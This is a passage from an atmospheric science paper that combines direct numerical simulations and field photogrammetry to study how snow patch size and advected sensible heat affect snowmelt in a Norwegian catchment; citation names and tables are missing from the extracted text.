$\\frac{{\\mathit{\\lambda }}_{\\mathrm{sn}}^{\\mathrm{2}}}{{\\mathit{\\lambda }}_{\\mathrm{elem}}^{\\mathrm{2}}}$ is the snow cover fraction (SCF) and varies between zero and 1. If this parameter is 1, the field is completely snow covered, whereas values close to zero represent low snow-cover fractions. For all simulations, this dimensionless group is set to a value of 0.25, similar to , as does not provide any information about this.\n\n• $\\frac{\\mathit{\\delta }}{{\\mathit{\\lambda }}_{\\mathrm{elem}}}$ is a measure of the size of a surface element compared to the height of the system. This nondimensional number will decrease if the typical element size increases. If the snow cover fraction is kept constant, changes in this variable will affect the typical snow patch size, meaning that this variable can be interpreted as a measure of the relative snow patch size.\n\n• $-\\frac{{b}_{\\mathrm{sn}}\\mathit{\\delta }}{{u}^{\\mathrm{2}}}$ is the bulk Richardson number above the snow patches (Risn). Positive and negative values indicate, respectively, stability and instability, whereas the absolute values specify the magnitude of the (in)stability.\n\n• $-\\frac{{b}_{\\mathrm{bg}}\\mathit{\\delta }}{{u}^{\\mathrm{2}}}$ is the bulk Richardson number above the bare ground (Ribg). For Ribg, the same principles hold as for Risn.\n\nWe ensure that the increases in snow patch size λsn that are necessary for our analysis only affect the relative element size $\\frac{\\mathit{\\delta }}{{\\mathit{\\lambda }}_{\\mathrm{elem}}}$. We do this by changing λsn in tandem with λelem such that the snow cover fraction $\\frac{{\\mathit{\\lambda }}_{\\mathrm{sn}}^{\\mathrm{2}}}{{\\mathit{\\lambda }}_{\\mathrm{elem}}^{\\mathrm{2}}}$ remains constant. This allows us to study the impact of increasing the snow patch size separately from the snow cover fraction.\n\n### 3.2.2 Parameter estimation\n\nThe measurements of are first used to calculate the values of the defined dimensionless parameters (Table 1). Note that not all values of the variables used in the dimensionless parameters are known and are therefore estimated based on other literature, such as (Table 2). Subsequently, the values of the variables from are filled into the nondimensional parameters so that the remaining dimensionless parameters can be calculated for all simulations.\n\nIt should be noted that, for the P60m simulation, the nondimensional number $\\frac{\\mathit{\\delta }}{{\\mathit{\\lambda }}_{\\mathrm{elem}}}$ is rather low and could potentially affect the outcomes. During this simulation, the number is 0.83, whereas the number was originally designed to be approximately 1 or higher so that the relative snow patch size would not be too large. The implications of this could be that the largest turbulent structures arising due to the snow patches do not have enough space to develop and are therefore affected by the horizontal domain of the simulation. However, the results show no clear deviations from the expectation, and thus we assume that the influence of this value of the nondimensional number is relatively minor to nonexistent.\n\nTable 1Dimensionless parameter values. Overview of the values of the dimensionless parameters applied during the simulations.", null, "* These are not, in fact, real Richardson numbers, as buoyancy does not affect the flow in the P15m-NB simulation.\n\nTable 2Variable values applied in the simulations. Overview of the values used for obtaining the dimensionless parameters in the simulations.", null, "* Values were estimated based on .\n\n## 3.3 Rescaling the model results to reality\n\nAfter nondimensionalizing the system for the simulations, the outcomes of the simulations are rescaled back to realistic scales to compare with the observations. In order to do so, the nondimensional numbers are used, as these numbers characterize the dominant processes in the considered idealized system.\n\nWhen rescaling the surface heat fluxes back to reality, Risn influences the rescaling factor that is used. This factor indicates whether shear-driven turbulence or buoyancy-driven turbulence or a balance between the two is more dominant in the system, and thus also which process predominantly affects the surface buoyancy flux scaling. We assume shear-driven turbulence to be dominant near the surface, such that the rescaling equation becomes\n\n$\\begin{array}{}\\text{(6)}& {B}_{\\mathrm{0}}=u{b}_{\\mathrm{sn}}\\phantom{\\rule{0.125em}{0ex}},\\end{array}$\n\nin which B0 is the typical buoyancy surface flux (m2 s−3), bsn is the surface buoyancy of snow (m s−2), and u is the wind speed (m s−1). This equation is derived from the original equation for surface buoyancy flux implemented in the model\n\nin which δv is the depth of the viscous sublayer (m), which is assumed to be of the same order of magnitude as δz, whereas bsn is assumed to be a measure of δb. For δv, we use the viscous sublayer instead of the boundary layer, as the latter is approximately neutral, such that buoyancy is constantly zero throughout the layer except near the surface.\n\nEquation (8) follows from a definition of the height of the viscous sublayer δv for conditions in which shear dominates, such that δv is determined by the wind and viscosity. This allows us to set up a relation between these three variables:\n\n$\\begin{array}{}\\text{(8)}& \\begin{array}{rl}{\\mathit{\\delta }}_{\\mathrm{v}}& =f\\left(u,\\mathit{\\nu }\\right),\\\\ & \\sim \\frac{\\mathit{\\nu }}{u}.\\end{array}\\end{array}$\n\nImplementing this in Eq. (7) gives Eq. (6):\n\n$\\begin{array}{}\\text{(9)}& {B}_{\\mathrm{0}}\\sim \\mathit{\\kappa }\\frac{{b}_{\\mathrm{sn}}}{\\left(\\frac{\\mathit{\\nu }}{u}\\right)}=\\mathit{\\kappa }u\\frac{{b}_{\\mathrm{sn}}}{\\mathit{\\nu }}=u{b}_{\\mathrm{sn}},\\end{array}$\n\nas κ and ν cancel out since Pr (i.e., $\\frac{\\mathit{\\nu }}{\\mathit{\\kappa }}$) is unity in this study. Subsequently, this equation can be used to rescale the simulated surface buoyancy fluxes back to realistic values according to\n\n$\\begin{array}{}\\text{(10)}& \\frac{{B}_{\\mathrm{0},\\mathrm{sim}}}{{B}_{\\mathrm{0},\\mathrm{real}}}=\\frac{{u}_{\\mathrm{sim}}{b}_{\\mathrm{sn},\\mathrm{sim}}}{{u}_{\\mathrm{real}}{b}_{\\mathrm{sn},\\mathrm{real}}}.\\end{array}$\n\nFrom Table 2, it follows that ${b}_{\\mathrm{sn},\\mathrm{sim}}=-\\mathrm{0.008}$ m s−2, ${b}_{\\mathrm{sn},\\mathrm{real}}=-\\mathrm{0.28}$ m s−2, usim=0.11 m s−1, and ureal=6.4 m s−2, so the equation reduces to\n\n$\\begin{array}{}\\text{(11)}& \\frac{{B}_{\\mathrm{0},\\mathrm{sim}}}{{B}_{\\mathrm{0},\\mathrm{real}}}=\\frac{\\mathrm{0.11}×-\\mathrm{0.008}}{\\mathrm{6.4}×-\\mathrm{0.28}}=\\mathrm{4.9}×{\\mathrm{10}}^{-\\mathrm{4}}.\\end{array}$\n\nThus, the simulated values for the surface buoyancy fluxes are divided by $\\mathrm{4.9}×{\\mathrm{10}}^{-\\mathrm{4}}$ to compute the realistic values.\n\nSubsequently, the outcome for the realistic surface heat fluxes can be transformed into W m−2 according to\n\n$\\begin{array}{}\\text{(12)}& {H}_{\\mathrm{real}}=\\mathit{\\rho }{c}_{\\mathrm{p}}\\frac{{\\mathit{\\theta }}_{\\mathrm{0}}}{g}{B}_{\\mathrm{real}},\\end{array}$\n\nin which H is the sensible heat flux into the surface (W m−2), ρ is the density of the air (kg m−3), cp is the specific heat capacity (J kg−1 K−1), θ0 is the reference temperature (273 K in this case), and g the gravitational acceleration (m s−2).\n\nTo rescale the simulated time back to reality, the bulk Richardson number above snow (${\\mathit{Ri}}_{\\mathrm{sn}}=-\\frac{{b}_{\\mathrm{sn}}\\mathit{\\delta }}{{u}^{\\mathrm{2}}}$) is used for obtaining the timescale. From this number, the following timescale is derived:\n\n$\\begin{array}{}\\text{(13)}& \\frac{\\mathit{\\delta }}{u}={t}_{\\mathrm{adv}}\\phantom{\\rule{0.125em}{0ex}},\\end{array}$\n\nWhen calculating the ratios between the simulated and measured timescales by making use of the values in Table 2, the following ratio between the simulated and realistic timescales arises:\n\n$\\begin{array}{}\\text{(14)}& \\frac{{t}_{\\mathrm{adv},\\mathrm{sim}}}{{t}_{\\mathrm{adv},\\mathrm{meas}}}=\\frac{\\mathrm{9.09}}{\\mathrm{15.63}}=\\mathrm{0.58}.\\end{array}$\n\nThus, the simulated time is divided by 0.58 to compute the realistic value.\n\n## 3.4 Model description and setup\n\nIn this study, the model simulations are performed using the MicroHH 2.0 code, which was primarily made for the DNS of atmospheric flows over complex surfaces by . When solving the conservation equations for mass, momentum, and energy, MicroHH makes use of the Boussinesq approximation, such that the evolution of the system for a velocity vector with element ui, buoyancy b, and volume is described by\n\n$\\begin{array}{}\\text{(15)}& \\begin{array}{rl}\\frac{\\partial {u}_{i}}{\\partial t}+\\frac{\\partial {u}_{j}{u}_{i}}{\\partial {x}_{j}}& =-\\frac{\\partial \\mathit{\\pi }}{\\partial {x}_{i}}+{\\mathit{\\delta }}_{i\\mathrm{3}}b+\\mathit{\\nu }\\frac{{\\partial }^{\\mathrm{2}}{u}_{i}}{\\partial {x}_{j}^{\\mathrm{2}}},\\\\ \\frac{\\partial b}{\\partial t}+\\frac{\\partial {u}_{j}b}{\\partial {x}_{j}}& =\\mathit{\\kappa }\\frac{{\\partial }^{\\mathrm{2}}b}{\\partial {x}_{j}^{\\mathrm{2}}},\\\\ \\frac{\\partial {u}_{j}}{\\partial {x}_{j}}& =\\mathrm{0},\\end{array}\\end{array}$\n\nin which π is a modified pressure . Moreover, MicroHH uses periodic boundary conditions in the horizontal directions, which implies that we simulate a wind blowing over an infinite snow field. In the following parts of the article, when we report vertical sensible heat fluxes into the surface, these were recalculated from the surface buoyancy flux B (m2 s−3) computed in the model equation according to\n\nwhich can be recalculated to give realistic sensible heat fluxes following the steps in Sect. 3.2. Similarly to (Eq. 2), the horizontally advected sensible heat is computed via\n\n$\\begin{array}{}\\text{(17)}& {H}_{\\mathrm{adv}}=\\underset{z=\\mathrm{0}\\phantom{\\rule{0.125em}{0ex}}\\mathrm{m}}{\\overset{z=\\mathrm{2}\\phantom{\\rule{0.125em}{0ex}}\\mathrm{m}}{\\int }}\\mathit{\\rho }{c}_{\\mathrm{p}}\\stackrel{\\mathrm{‾}}{u}\\frac{\\partial \\stackrel{\\mathrm{‾}}{\\mathit{\\theta }}}{\\partial x}\\mathrm{d}z,\\end{array}$\n\nin which z (m) is the elevation above the surface, ρ (kg m−3) is the air density, cp (1005 J kg−1 K−1) is the specific heat capacity of air, and x (m) is the distance from the leading edge of the snow patch. As well as integrating over a 2 m profile height, we also integrate over a 4 m height.\n\nThe starting point for designing the numerical experiments is the atmospheric turbulent channel flow with a reduced Reynolds number (Re) designed by . This simulation is also used as a spin-up, during which we have no buoyancy effects included in the flow. The shear Reynolds number Reτ obtained from the measurements performed by is relatively high compared to that of : $\\sim \\mathrm{6}×{\\mathrm{10}}^{\\mathrm{6}}$ vs. 590, but the results of suggest that the bulk statistics, i.e., the means and variances, for at least the initial neutral channel flow are hardly affected Reτ. This channel flow is simulated in MicroHH at a resolution of 384 × 192 × 128 grid points for a domain size of 2π m ×π m × 2 m. The flow is forced in the x direction by imposing an average wind speed, which is, in this case, 0.11 m s−1. At the bottom and top boundaries, no slip and no penetration conditions are applied to the velocities (i.e., the flow velocity at the boundary is zero). Overall, showed that MicroHH is able to reproduce this turbulent channel flow.\n\nInitially, the turbulent channel flow from used as a spin-up is simulated until 1800 s so that the turbulent channel flow is well developed. Subsequently, for each simulation, which takes 900 s, this turbulent channel flow is adapted such that an atmospheric flow over a patchy snow surface is obtained. At the bottom boundary, a pattern of surface buoyancies that depends on the simulation is prescribed, such that the surface characteristics determined during the dimensional analysis are fulfilled. For snow and bare ground, the surface buoyancy is respectively $-\\mathrm{8}×{\\mathrm{10}}^{-\\mathrm{3}}$ and 0.0 m s−2 (i.e., 273 and 280.9 K in reality), which is elaborated on in Sect. 3.2. The implemented surface for P15m and P15m-NB (P30m, P60m) contains snow patch lengths of 0.15 m (0.30 m, 0.60 m) on average, and average element lengths of 0.30 m (0.60 m, 1.20 m) (Table 2; multiplied with 100 in Fig. 3). These surfaces enable the model to solve the periodic boundary conditions, because we ensure that the patches at opposing walls fit together and that flow that leaves the system on one side continues over the same snow patch when it reenters the system on the opposite wall. These patterns are created by generating noise in the Fourier space around specific wavelengths, prescribed in the form of 2D power spectra. When transforming these back to physical space using the inverse fast Fourier transform, a 2D field with dominant patterns is obtained. For a more elaborate explanation of generation, see Appendix B.", null, "Figure 3Generated realistic surface temperatures for the P15m and P15m-NB (a), P30m (b), and P60m (c) simulations.\n\n4 Field observations\n\nAt the upwind edge of the snow patch, the snow surface decreased by approximately 23 cm, whereas for the downwind edge, this decrease was approximately 3 cm (Fig. 4). For the upwind edge, the height change is computed relative to 11 June 17:00 LT. For the downwind edge, the height change is computed relative to 12 June 16:00 LT, due to a low coverage of bare ground pixels on 11 June (Fig. A1), which are used for computing the vertical correction employed to align all height maps (Table 3). For the upwind edge, the melt relative to 12 June 16:00 LT is estimated to be 21 cm.", null, "Figure 4Boxplot of height changes for the upwind and downwind edges of a snow patch recorded with SfM photogrammetry from 11 June 2019 until 15 June 2019. For the upwind edge, 11 June is taken as the reference date. For the downwind edge, the first measurement on 11 June is not used as the reference, due to a low coverage of grid cells. The melt is estimated with an error of ±2.0 and ±0.4 cm, respectively, for the upwind and downwind edges.\n\nThe average standard error after applying the vertical correction for the bare ground grid cells that are present throughout the all height maps is 1.38 cm for the upwind edge and 0.29 cm for the downwind edge. The propagation of these errors ($\\sqrt{\\mathrm{2}{\\mathit{\\sigma }}_{\\mathrm{\\Delta }\\stackrel{\\mathrm{‾}}{h}}^{\\mathrm{2}}}$), which is caused by relating the height changes in two height models, allows us to estimate the melt with an error of ±2.0 and ±0.4 cm, respectively, for the upwind and downwind edges. Usually, these standard errors are calculated over other grid cells rather than those used for the vertical correction, such that these points are independent. In this study, however, the standard error and vertical correction are computed for all bare-ground grid cells present throughout the research period, since the relatively small spatial scale causes all grid cells to be related. Considering the errors, for the upwind edge, significant melt was recorded on 13 June and onwards as compared to 11 June, used as reference. For the downwind edge, significant melt was recorded on 13 and 15 June, taking 12 June as reference. For the third period from 13 to 14 June, an increase in snow height relative to the previous day was recorded, but this increase was not significant due to overlapping error estimates.\n\nTable 3Vertical shift correction (cm) applied in the individual height models per day for the upwind and downwind locations.", null, "* Only computed with the bare ground grid cells present in this height map.\n\n## 4.1 Relation between snowmelt and meteorology\n\nRelating the meteorological circumstances (Table 4) to the measured snowmelt allows us to estimate the contribution of the vertical turbulent heat fluxes to the total amount of snowmelt. To do so, the snow density measurements are used. The snow densities at 5, 25, and 45 cm below the snow surface are, respectively, 556, 551, and 610 kg m−3. It follows from these densities that the snow density is approximately constant near the surface, whereas the snow is more compressed or stores water further down. Even though these densities are relatively high, we consider the values to be realistic considering that the largest discharge peak took place 1.5 months before the observation period (Fig. 1) and given the observation that the snowpack was relatively wet in the field.\n\nTable 4Average meteorological measurements and calculated variables in between the photogrammetry observations. T2 m is the air temperature measured at 2 m; u10 m and udir are, respectively, the wind speed and wind direction in degrees from the north and measured at 10 m; Pr is the summed precipitation during the period; SW and LW are, respectively, the incoming shortwave and longwave radiation; RH2 m is the measured relative humidity at 2 m; and Pa is the air pressure. The net radiation (Rnet), subsequent melt (MR), and specific humidity difference (qqsn) were computed based on a combination of the measured variables. The ranges for Rnet and MR are caused by applying two values for the albedo, i.e., 0.6 and 0.8, to account for uncertainties in the shortwave radiation component (see Sect. 2).", null, "The minimum estimated melt due to net radiation from 12 June until 15 June was 3.9 cm (Table 4), which is 0.5 cm larger than the melt estimate including the error for the downwind edge. As the snow patch was approximately 50 m in length, the turbulent heat fluxes into the snow likely reduced to negligible values at the downwind edge (e.g., when extrapolating the measurements of ), so this mismatch is most likely caused by uncertainties in the net radiation estimates. When assuming this radiation to be an appropriate estimate and that it is homogeneously spread over the patch, the estimated contribution of the vertical turbulent heat fluxes at the upwind edge is 13.0 to 18.2 ± 2.0 cm. For this, we also assume that the residual of the difference between the observed snowmelt and radiation-driven snowmelt is caused by these turbulent heat fluxes (e.g., ). When using Eq. (2) to compute the average vertical turbulent heat fluxes during the period, we estimate these fluxes at the upwind edge to be between 73 and 102 ± 11 W m−2. These are of the same order as those found in other studies in somewhat similar conditions, such as , , and . reported a sensible heat flux into the snow of up to 50 W m−2 for typical weather situations in alpine areas, whereas the latent heat was negligible or even contributed to the cooling of the snow. reported downward turbulent heat fluxes of over 100 W m−2 for a large single snow patch. estimated the full energy balance for 15 d in May of a relatively homogeneous snow cover near Finse and reported a sensible heat flux of approximately 20 W m−2 and a latent heat flux that was negligible on average. For our observations, however, it is expected the latent heat flux also had a significant contribution from the high relative humidity, with a subsequent difference in specific humidity between the air and snow of at least 0.9 g kg−1 (Table 4) during the field campaign, which is common for Finseelvi as it is located in a maritime climate. Our results show similar moisture gradients to , who found a significant influence of the latent heat on the snowmelt, such that we expect this to be a significant part of our estimated turbulence-driven melt. Overall, by comparing the overall melt with the melt driven by the radiation and taking the residual as the turbulence-driven melt, we estimate the contribution of the turbulent heat fluxes to the snowmelt to be roughly 60 to 80 % for the upwind edge of the snow patch. Extrapolating this to the entire catchment and applying the relations reported by for two test sites in the Alps, we estimate the contribution of the fluxes to the total melt to be maximally on the order of 10 % under the assumption that the entire catchment behaves similarly.\n\nIt is likely that the incoming radiation for the entire snow patch is overestimated, due to topography. The incoming solar radiation at the snow patch is blocked by mountains at low solar angles in the east and west, which does not apply at the location of the meteorological observations. Moreover, the incoming longwave radiation reduces with height, as was found in the Alps by , such that this snow patch – located 150 m higher – received less incoming longwave radiation. Lastly, other characteristics influencing the net radiation, such as a varying snow albedo and slightly different slopes for the upwind and downwind edges, are also identified as potential influences on the results.\n\n5 Model simulations\n\n## 5.1 System characteristics\n\nIn the idealized simulations, the time-averaged sensible turbulent heat fluxes resemble the implemented surface pattern of snow patches (Fig. 5). There is a negative surface flux on the snow patches, whereas the surface flux is positive at the bare ground. For each snow patch, there is a clear pattern that is somewhat similar to the observations. The leading edge of the snow patch shows the highest fluxes towards the surface, $\\sim -\\mathrm{500}$ W m−2, which decreases downwind of the leading edge until the end of the patch. Subsequently, at the trailing edge of the snow patch and the leading edge of the bare ground, the sensible heat flux changes sign, as the bare ground is relatively warm compared to the colder air coming from above the snow patch, resulting in ∼300 W m−2. The air warms when flowing over the bare ground, such that the air arriving at the next snow patch is relatively warm compared to that at the cold snow patch, causing a high downward flux. These fluxes at the leading edges of the snow patches are relatively high, mostly due to the presence of ideal circumstances for wind-driven melt, including local-scale advection of sensible heat (i.e., high wind speeds and relatively large temperature differences). Compared to our own observations, the sensible heat fluxes at the leading edge are much larger than the observed combined turbulent heat fluxes. This is in line with our expectations because of the inclusion of nonideal circumstances for local-scale advection of the sensible and latent heat during the field campaign.", null, "Figure 5Time-averaged surface sensible turbulent heat fluxes. Sensible turbulent heat fluxes in the P15m simulation averaged from 2000 seconds until 2700 s. Negative values indicate a downward flux, i.e., over snow patches, whereas positive values resemble an upward flux, i.e., over bare ground.\n\n## 5.2 Total snowmelt\n\nWhen comparing the average sensible heat fluxes for all the snow patches in the domain, clear differences arise between all simulations (Fig. 6). The highest sensible heat fluxes towards the snow (i.e., the most negative fluxes) are found in the simulation without buoyancy effects. This also causes the total sensible heat flux in this simulation to be significantly lower than in the other simulations. Furthermore, increasing the snow patch size reduces the heat fluxes into the snow patches. The heat fluxes of the simulation with a doubled snow patch size (P30m) are decreased by approximately 15 % relative to the P15m simulation. For the simulation with a quadrupled snow patch size (P60m), the heat fluxes are reduced by approximately 25 %. This is in contrast to the results of , who report only a minor influence of snow patch size on the amount of melt. Our findings are more in line with the results of , who based their work on a 2D boundary layer model with a regular tiled surface pattern. Potentially, the differences from are caused by the inability of ARPS to fully resolve the leading edge effect, as the resolution is too coarse to resolve the thin internal stable boundary layer formed over snow patches and the Monin–Obukhov assumptions are violated. Neither of these limitations apply for DNS.", null, "Figure 6Domain-averaged sensible heat fluxes for different surfaces. The figure shows time series of the averaged surface sensible heat fluxes for the bare ground, snow, and total surface after the introduction of the temperature differences at the surface.\n\nThe total heat fluxes for the simulations with 15, 30, and 60 m snow patches coincide approximately, as the differences arising at the snow surface are compensated for at the bare ground surface. So, although the total fluxes are equal, the snowmelt does vary with snow patch size. The simulation without buoyancy effects (P15m-NB) has a significantly reduced total heat flux compared to the original simulation (P15m). This is caused by similar averaged heat fluxes for the bare ground for both simulations, whereas this is not the case above the snow patches. This suggests that stability has little effect on the fluxes above the bare ground, whereas the surface heat fluxes above the snow are affected by stability.\n\nMoreover, the largest adjustment of the sensible heat fluxes after the initiation of the simulations is done after less than 200 s. However, a minor long-term trend is still present for each simulation. For this study, we assume that after the largest adjustment, the dominant processes are well developed and suffice to understand the system. We expect that, eventually, the total summed surface sensible heat fluxes will go to zero, due to the infinite blowing of the air over the snow cover without any other heat fluxes than those originating from the snow patches and bare ground. However, as the volume of the channel is relatively large compared to the heat fluxes, it takes a relatively long time before the whole system has cooled and reached an equilibrium.\n\n## 5.3 Surface fluxes for individual patches\n\nThe surface fluxes for all individual snow patches in each simulation show a similar behavior over distance from the leading edge, but differences occur above snow patches due to varying fluxes at the leading edge (Fig. 7). The linear behavior of the surface fluxes as a function of the distance from the upwind edge on logarithmic axes implies that the fluxes decay over distance from the leading edge according to a power law. The power laws take the following approximate forms:\n\n$\\begin{array}{}\\text{(18)}& {H}_{\\mathrm{sn}}\\left(x\\right)\\equiv {C}_{\\mathrm{sn}}{x}^{-\\mathrm{0.35}},\\end{array}$\n\nin which Hsn (W m−2) is the sensible heat flux, x (m) is the distance from the leading edge, and C (W m−1.65​​​​​​​) is a constant representing the initial conditions at the leading edge of each patch.", null, "Figure 7Time-averaged surface sensible heat fluxes over single patches of snow. The surface sensible heat fluxes for individual patches with snow as a function of distance from the leading edge on a log-log​​​​​​​ scale at y=1.1 m are shown. The dashed black line is a trendline implemented to show the approximate power law decay of the fluxes over distance. The fluxes of the snow are multiplied with −1 so that these values can also be plotted on logarithmic axes.\n\nOur simulated vertical sensible heat fluxes into the snow are approximately 500 W m−2 at the upwind edge and 200–300 W m−2 at the downwind edge. In comparison to our field observations, these sensible heat fluxes at both edges are relatively high. At the upwind edge, the simulated sensible heat fluxes are approximately 5 times larger than the derived contribution of the combined turbulent heat fluxes to the measured snowmelt. We reckon that the simulated values are large, though it should be noted that the simulations are based on highly ideal conditions for turbulence-driven melt and local-scale advection of sensible and latent heat, whereas the conditions during the measurements were not ideal (e.g., nighttime melt was included). At the downwind edge, the measurements suggest an approximately negligible contribution of the vertical turbulent heat fluxes to the snowmelt, whereas, at comparable snow patches, the simulations show a significant contribution of the sensible heat flux (∼200–300 W m−2). Thus, the simulated decay of the sensible heat flux seems to be an underestimation in comparison to field observations. We expect that the comparable behavior of the sensible heat fluxes between patches within the idealized system is also occurring within the Finseelvi catchment for patches within similar local conditions.\n\nFigure 7 shows that the length of snow patches is the main cause of less snowmelt for larger patches, which was also found by . The power laws are approximately the same for each patch and simulation, whereas Csn is the same for each simulation except in the simulation without buoyancy effects. This behavior explains why larger snow patches reduce the average surface fluxes into the snow patches.\n\nThe behavior of the simulation without buoyancy effects is striking, as the decay of the fluxes for this simulation is similar to the decay of the fluxes for the other simulations, suggesting that stability has little influence on the decay of the surface heat fluxes, i.e., shear turbulence dominates. However, this simulation has a relatively low initial surface flux above the snow (a higher absolute flux in Fig. 7), indicating an effect of the stability on the leading edge conditions. Thus, the differences in total snowmelt (Fig. 6) between the P15m and P15m-NB simulations solely occur due to these differences at the leading edge.\n\nThe decay of the sensible heat fluxes is a consequence of the decreasing temperature gradients in the IBL (Fig. 8a). Wind speed, another important component affecting the sensible heat flux, remains constant over a snow patch (Fig. 8b). Moreover, surface roughness is the same for the entire domain. Strikingly, the average temperature within the IBL remains constant and does not depend on the height of this IBL, as the shape of the vertical temperature profile remains constant while the flow proceeds over the snow patch (Fig. 8a inset). Yet, it should be noted that the reported values for the height of the IBL are relatively high compared to .", null, "Figure 8Time-averaged vertical temperature (a) and wind (b) profiles and horizontally advected sensible energy Hadv at 2 and 4 m integration height and vertical sensible heat flux at the surface Hsn (c) along the snow patch at y=83 m and x=150 m in the P30m simulation. The markers in the temperature profile resemble the IBL height, which is computed as the first value (seen from the bottom) of the gradient of the temperature with height below 0.1 K m−1. The first two upwind grid cells and two downwind grid cells have been removed, as these are located in the transition region from bare ground to snow and vice versa. The labels with “x=” show the locations of vertical profile related to the downwind distance of the vertical profile from the leading edge, whereas the line color indicates the distance from the leading edge and goes from purple to red. In the inset graph, the vertical temperature profile has been normalized to the height of the IBL and the prescribed temperatures of the surface and atmosphere. The advected energy as a function of distance from the leading edge is based on Eq. (17).\n\n6 Discussion\n\nThis study aimed to assess the role of local-scale advection of sensible and latent heat fluxes on snowmelt. In order to do so, complementary field observations and simulations were performed. On small spatial scales, the largest melt differences due to the combined turbulent heat fluxes occur at the opposing edges of snow patches. Our results show that the upwind edge of a single snow patch in the Finseelvi catchment, which is approximately 50 m in length, melted 23 ± 2.0 cm over the course of 5 d, whereas the downwind edge melted just 3 ± 0.4 cm in 4 d. As the snow patch was approximately 50 m long, the vertical turbulent heat fluxes likely reduced to negligible values at the downwind edge, due to the leading edge effect, such that the main cause of melt at this edge was the net radiation. The simulations allowed us to extract detailed information on the atmospheric flow and were used as a tool to provide insight into the evolution of the fluxes and temperature over the patchy snow cover. The sensible heat fluxes reduce over distance from the upwind edge, following a constant power law which likely depends on the meteorological circumstances. In the simulations, this resulted in a reduction of 15 % and 25 % for, respectively, a doubling and a quadrupling in snow patch size. The simulations reveal that the reducing sensible heat fluxes over distance from the leading edge are caused by the reducing temperature gradients, pointing out the major role of the horizontally advected sensible heat, which we expect behaved similarly in our field observations. Other important factors for the turbulent heat fluxes, i.e., wind speed and surface roughness, are constant over distance from the leading edge in the simulations.\n\nHowever, the simulations lacked surface roughness differences for the snow and bare ground and topographical variations. Including the transition from a rough (bare ground) to a smooth (snow) surface would likely diminish the IBL growth due to increased turbulence levels and enhance the vertical sensible heat fluxes as a consequence of the larger temperature gradients in the IBL (Garratt1990). It should be noted that this mostly holds for shear-dominated turbulence, whereas at lower wind speeds, the influence of thermal turbulence on the IBL should also be considered. Moreover, the common formation of snow patches in topographical depressions causes atmospheric decoupling and reduced vertical turbulent heat fluxes at low and moderate wind speeds, especially downstream of the upwind edge . In the Finseelvi catchment, snow patches have formed to some extent in these depressions, while this does not hold for , Also, the choice to base the numerical experiments on instead of our own observations complicates an exact comparison. Lastly, the exclusion of external forcings, such as radiation or large-scale advection, caused the simulations to approach equilibrium, due to the compensation between the sensible heat fluxes at the snow patches and the bare ground. This is advantageous for investigating the behavior of the system in relation to snow patch size, but makes it more difficult to compare other characteristics (e.g., temperature) with, for example, , who did include external forcings, such as incoming radiation. Overall, these mechanisms greatly increase the uncertainty and made us decide not to directly compare between the simulations and observations.\n\nOn a catchment scale, these simulation results imply that differences in snowmelt within a highly idealized catchment occur solely due to snow patch length. The sensible heat fluxes into the snow at the upwind edges of the patches are independent of snow patch size and show the same decay over distance from the leading edge, such that systems with typically larger patches have, on average, reduced sensible heat fluxes into the snow. The major cause of these fluxes seems to be the horizontal advection of sensible heat. It should be noted that the latent heat flux, which is not considered in these simulations, can also play a significant role in the amount of snowmelt . For this flux, we expect similar mechanisms in our simulations based on the observations of . Variations in surface roughness and topography mostly create micrometeorological circumstances which differ substantially from the average circumstances within a catchment, for example through shading or a slope-induced drainage flow, and thus also affect snowmelt. We expect that the important role of the horizontally advected sensible heat and the identical behavior of the vertical sensible heat flux between patches, both of which were found in the simulations, are also applicable to our field observations, given the probable larger-scale approximate equilibrium of the atmosphere. However, anomalies in this behavior can be found due to varying micrometeorological conditions. Overall, our results imply that the performance of snowmelt prediction would improve if the snow patch size distribution was also considered. Information on and the usage of these distributions can be obtained with various methods, ranging from relatively simple methods, for example scaling laws (e.g., ), to more complex methods, for example assimilating various satellite retrievals (e.g., ).\n\nThe melt estimates obtained with SfM photogrammetry are in line with our expectations based on rough visual estimates made during the field campaign, whereas the estimated errors are relatively small. The errors are of the same order of magnitude as those found for high-accuracy snow depth estimates obtained from time-lapse photography (e.g., ), though it should be noted that those studies focus on somewhat larger areas. Overall, this illustrates that the influence of the vertical turbulent heat fluxes on melting snow patches is widespread and can even be observed with relatively simple and cheap methods. One of the potential limitations of this study is the choice to solely use grid cells that are continuously covered, causing the amount of available grid cells to reduce drastically and the snowmelt to be underestimated, especially at the upwind edge due to the retreating snow line. Advantageously, this shrinks the chance of grid cells being randomly scattered, which could result in unrealistic height changes. Moreover, the weather conditions on multiple days during the field campaign complicated the identification of tie points, due to the limited amount of light . Lastly, a small angle between the camera position and the horizontal snow surface was uncommon, as the method was often applied with camera positions at higher angles of incidence (e.g., with drone imagery). Overall, this meant that not all of the objects were captured from multiple perspectives, again complicating tie point identification. A possible solution to these limitations could be to add passive control points in the snow to create more tie points for the software to connect to. For more precise radiation and thus melt estimates, this study could have benefited from radiation modeling using high-resolution terrain information (cf. e.g., ). Future studies could also make use of lidar scanners, which have have recently gone into mass production; hence, we are seeing a corresponding drop in cost.\n\nA potential weakness of our simulations is the application of a low Reτ compared to the observations of (i.e., 590 vs. $\\sim \\mathrm{6}×{\\mathrm{10}}^{\\mathrm{6}}$). This saves computational costs, which are relatively high for DNS, and was done based on the results of , who showed large differences between Reτ=180 and Reτ=395, whereas Reτ=590 had similar bulk quantities and variances to the latter simulation. Adjusting Reτ possibly affected the surface momentum fluxes, of which thus also the heat fluxes. Furthermore, the low Re likely caused the fluxes in the IBL to be predominantly diffusive, whereas, in reality, turbulent fluxes are more likely to dominate. As diffusive timescales are typically larger than turbulent timescales, the typical time- and length scales of the processes in the IBL are relatively large compared to reality, such that one of the processes affected by this could be the decay of the vertical sensible heat fluxes over distance from the leading edge of a snow patch. To uncover whether the sensible heat fluxes and the decay are whether the sensible heat fluxes and the decay are dependent on Reτ, we recommend performing simulations with higher Reτ. Increasing Re will reduce the scale of the smallest eddies, i.e., the Kolmogorov length scale (Pope2000), such that an enhancement of the resolution will possibly also be required. Taken together with the influence of using an idealized system, this means that our formulated relationship between the sensible heat flux at the surfaces of the snow patches and the distance from the upwind edge (i.e., ${H}_{\\mathrm{sn}}\\sim {x}^{-\\mathrm{0.35}}$) should be approached with caution. However, the method does illustrate the use of DNS in coming up with potentially useful relationships. Future studies would need to look further into the abovedescribed behavior, especially when more comparable high-resolution data are available.\n\nMoreover, we can identify some inaccuracies during the nondimensional scaling of the wind speed and the temperature difference between the snow and atmosphere. As reported a wind speed of 6.4 m s−1, this value is also considered in our dimensional analysis and related to 0.11 m s−1, which was the average wind speed over the whole channel in the 